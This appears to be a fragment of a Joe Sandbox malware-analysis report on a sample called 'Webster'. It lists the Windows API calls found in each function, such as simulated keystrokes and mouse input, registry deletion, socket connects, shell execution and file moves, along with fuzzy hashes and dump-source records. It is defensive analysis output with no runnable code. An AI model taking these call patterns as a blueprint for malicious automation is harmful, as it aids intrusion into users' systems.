                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                  • String ID:
                                                                                  • API String ID: 4072528602-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AFFB31
                                                                                  • _memset.LIBCMT ref: 00AFFBFA
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00AFFC3F
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00AFFCB6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AFFCE5
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                  • String ID: @
                                                                                  • API String ID: 3522835683-2766056989
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 00AE178B
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE17A0
                                                                                  • SetKeyboardState.USER32(?), ref: 00AE1801
                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AE182F
                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AE184E
                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AE1894
                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AE18B7
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  APIs
                                                                                  • GetParent.USER32(00000000), ref: 00AE15A4
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE15B9
                                                                                  • SetKeyboardState.USER32(?), ref: 00AE161A
                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AE1646
                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AE1663
                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AE16A7
                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AE16C8
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 2945705084-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00AE3BAA
                                                                                  • _wcscmp.LIBCMT ref: 00AE3BC6
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00AE3BDE
                                                                                  • _wcscat.LIBCMT ref: 00AE3C26
                                                                                  • SHFileOperationW.SHELL32(?), ref: 00AE3C92
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1377345388-1173974218
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B078CF
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07976
                                                                                  • IsMenu.USER32(?), ref: 00B0798E
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B079D6
                                                                                  • DrawMenuBar.USER32 ref: 00B079E9
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 3866635326-4108050209
                                                                                  APIs
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B01631
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0165B
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B01712
                                                                                    • Part of subcall function 00B01602: RegCloseKey.ADVAPI32(?), ref: 00B01678
                                                                                    • Part of subcall function 00B01602: FreeLibrary.KERNEL32(?), ref: 00B016CA
                                                                                    • Part of subcall function 00B01602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B016ED
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B016B5
                                                                                  Similarity
                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                  • String ID:
                                                                                  • API String ID: 395352322-0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B06911
                                                                                  • GetWindowLongW.USER32(014C4E08,000000F0), ref: 00B06944
                                                                                  • GetWindowLongW.USER32(014C4E08,000000F0), ref: 00B06979
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B069AB
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B069D5
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B069E6
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B06A00
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2178440468-0
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2CA
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2F0
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00ADE2F3
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00ADE311
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00ADE31A
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE33F
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00ADE34D
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AF68B1
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF68C0
                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF68F9
                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00AF6902
                                                                                  • WSAGetLastError.WSOCK32 ref: 00AF690C
                                                                                  • closesocket.WSOCK32(00000000), ref: 00AF6935
                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF694E
                                                                                  Similarity
                                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 910771015-0
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3A5
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3CB
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00ADE3CE
                                                                                  • SysAllocString.OLEAUT32 ref: 00ADE3EF
                                                                                  • SysFreeString.OLEAUT32 ref: 00ADE3F8
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE412
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00ADE420
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 3741a4c96ec5283837bac1eff850bc6232f8bc37bd88cf53f3ae9de7860f60fe
                                                                                  • Instruction ID: 45967c014259f426cf56926702c843274e09f68cf6a83e8dc3a4538df22a4488
                                                                                  • Opcode Fuzzy Hash: 3741a4c96ec5283837bac1eff850bc6232f8bc37bd88cf53f3ae9de7860f60fe
                                                                                  • Instruction Fuzzy Hash: 06214775604104AFEB50FFA8DC89DAE77ECEB09360B408526F915CF3A0DA75EC818764
                                                                                  APIs
                                                                                    • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                    • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                    • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B07C57
                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B07C64
                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B07C6F
                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B07C7E
                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B07C8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                  • String ID: Msctls_Progress32
                                                                                  • API String ID: 1025951953-3636473452
                                                                                  • Opcode ID: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
                                                                                  • Instruction ID: 61e5ced6a60e8176f22935a1ef49664890ec8008a765679d7bc40547c4cf08c6
                                                                                  • Opcode Fuzzy Hash: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
                                                                                  • Instruction Fuzzy Hash: B91186B1554219BEFF159F60CC85EE7BF5DEF08758F114115BA04A6090CB71AC21DBA4
                                                                                  APIs
                                                                                  • __init_pointers.LIBCMT ref: 00AA9D16
                                                                                    • Part of subcall function 00AA33B7: EncodePointer.KERNEL32(00000000), ref: 00AA33BA
                                                                                    • Part of subcall function 00AA33B7: __initp_misc_winsig.LIBCMT ref: 00AA33D5
                                                                                    • Part of subcall function 00AA33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AAA0D0
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AAA0E4
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AAA0F7
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AAA10A
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AAA11D
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AAA130
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00AAA143
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AAA156
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AAA169
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AAA17C
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AAA18F
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AAA1A2
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AAA1B5
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AAA1C8
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AAA1DB
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AAA1EE
                                                                                  • __mtinitlocks.LIBCMT ref: 00AA9D1B
                                                                                  • __mtterm.LIBCMT ref: 00AA9D24
                                                                                    • Part of subcall function 00AA9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AA9D29,00AA7EFD,00B3CD38,00000014), ref: 00AA9E86
                                                                                    • Part of subcall function 00AA9D8C: _free.LIBCMT ref: 00AA9E8D
                                                                                    • Part of subcall function 00AA9D8C: DeleteCriticalSection.KERNEL32(00B40C00,?,?,00AA9D29,00AA7EFD,00B3CD38,00000014), ref: 00AA9EAF
                                                                                  • __calloc_crt.LIBCMT ref: 00AA9D49
                                                                                  • __initptd.LIBCMT ref: 00AA9D6B
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00AA9D72
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                  • String ID:
                                                                                  • API String ID: 3567560977-0
                                                                                  • Opcode ID: 003e7ae8380d0f92ffa8a5a42378b9ec7a4817554eb24d77cdc94fabcf560873
                                                                                  • Instruction ID: e00c91f275d083daaa346851525c26a5e7bf3e10a00e2538969eca24e8af6fef
                                                                                  • Opcode Fuzzy Hash: 003e7ae8380d0f92ffa8a5a42378b9ec7a4817554eb24d77cdc94fabcf560873
                                                                                  • Instruction Fuzzy Hash: 75F090325197116EEB747B787D0369B76D4EF43770F20861AF550D70D3EF2089814191
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AA4282,?), ref: 00AA41D3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00AA41DA
                                                                                  • EncodePointer.KERNEL32(00000000), ref: 00AA41E6
                                                                                  • DecodePointer.KERNEL32(00000001,00AA4282,?), ref: 00AA4203
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoInitialize$combase.dll
                                                                                  • API String ID: 3489934621-340411864
                                                                                  • Opcode ID: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
                                                                                  • Instruction ID: 72fd1a0465d303c781fa555d311e7d400cf06c574c0276c7d09ed78a67c5d21b
                                                                                  • Opcode Fuzzy Hash: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
                                                                                  • Instruction Fuzzy Hash: 73E012B4560B41AFDB202B70EC4DB943595B756B06F908524B411E70F0DFF552C88F04
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AA41A8), ref: 00AA42A8
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00AA42AF
                                                                                  • EncodePointer.KERNEL32(00000000), ref: 00AA42BA
                                                                                  • DecodePointer.KERNEL32(00AA41A8), ref: 00AA42D5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                  • API String ID: 3489934621-2819208100
                                                                                  • Opcode ID: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
                                                                                  • Instruction ID: b845de99f921bb5eeee77b6b3462ef7386c22043c87de5c5fecc48b832087863
                                                                                  • Opcode Fuzzy Hash: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
                                                                                  • Instruction Fuzzy Hash: 28E0B674560B00BBDB21AB60BD0DBC43AA4BB5AB06F908129F001E74F1DFF447C4CA14
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 00A821B8
                                                                                  • GetWindowRect.USER32(?,?), ref: 00A821F9
                                                                                  • ScreenToClient.USER32(?,?), ref: 00A82221
                                                                                  • GetClientRect.USER32(?,?), ref: 00A82350
                                                                                  • GetWindowRect.USER32(?,?), ref: 00A82369
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                  • String ID:
                                                                                  • API String ID: 1296646539-0
                                                                                  • Opcode ID: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
                                                                                  • Instruction ID: 387ab62f6d015092b871b3e4e9fb259a027d70e09e0f35d95bac18050302a8cc
                                                                                  • Opcode Fuzzy Hash: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
                                                                                  • Instruction Fuzzy Hash: 17B18A3991024ADBDF10DFA8C9807FEB7B1FF08310F148129ED59AB255EB70AA50CB64
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3253778849-0
                                                                                  • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                  • Instruction ID: fe5ef885939191d549e2184630452d437aa04394730a4170be6c62479aeca92e
                                                                                  • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                  • Instruction Fuzzy Hash: F561DE3050069AABCF11FF61CE82EFE37A8AF59388F044959F9596B292DB309D45CB50
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0091D
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0095D
                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B00980
                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B009A9
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B009EC
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B009F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4046560759-0
                                                                                  • Opcode ID: 84111e30e923469819e95a7ae769d187b3a08aa7b6da308c3dbf96ba80e8e5e3
                                                                                  • Instruction ID: d41cdd7df34c62ad69f7e4a772a5269117f1e592709555cc55fe739ef412e2c4
                                                                                  • Opcode Fuzzy Hash: 84111e30e923469819e95a7ae769d187b3a08aa7b6da308c3dbf96ba80e8e5e3
                                                                                  • Instruction Fuzzy Hash: 36517831218205AFD714EF68C985E6EBBE9FF89314F04495DF485872A2EB31E905CB52
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 00B05E38
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00B05E6F
                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B05E97
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00B05F06
                                                                                  • GetSubMenu.USER32(?,?), ref: 00B05F14
                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B05F65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00ADF6A2
                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00ADF714
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00ADF76F
                                                                                  • _memmove.LIBCMT ref: 00ADF799
                                                                                  • VariantClear.OLEAUT32(?), ref: 00ADF7E6
                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ADF814
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE29FF
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2A4A
                                                                                  • IsMenu.USER32(00000000), ref: 00AE2A6A
                                                                                  • CreatePopupMenu.USER32 ref: 00AE2A9E
                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00AE2AFC
                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AE2B2D
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A81B76
                                                                                  • GetWindowRect.USER32(?,?), ref: 00A81BDA
                                                                                  • ScreenToClient.USER32(?,?), ref: 00A81BF7
                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A81C08
                                                                                  • EndPaint.USER32(?,?), ref: 00A81C52
                                                                                  Similarity
                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00B477B0,00000000,014C4E08,?,?,00B477B0,?,00B0BC1A,?,?), ref: 00B0BD84
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00B0BDA8
                                                                                  • ShowWindow.USER32(00B477B0,00000000,014C4E08,?,?,00B477B0,?,00B0BC1A,?,?), ref: 00B0BE08
                                                                                  • ShowWindow.USER32(00000000,00000004,?,00B0BC1A,?,?), ref: 00B0BE1A
                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00B0BE3E
                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B0BE61
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00AF550C,?,?,00000000,00000001), ref: 00AF7796
                                                                                    • Part of subcall function 00AF406C: GetWindowRect.USER32(?,?), ref: 00AF407F
                                                                                  • GetDesktopWindow.USER32 ref: 00AF77C0
                                                                                  • GetWindowRect.USER32(00000000), ref: 00AF77C7
                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00AF77F9
                                                                                    • Part of subcall function 00AE57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877
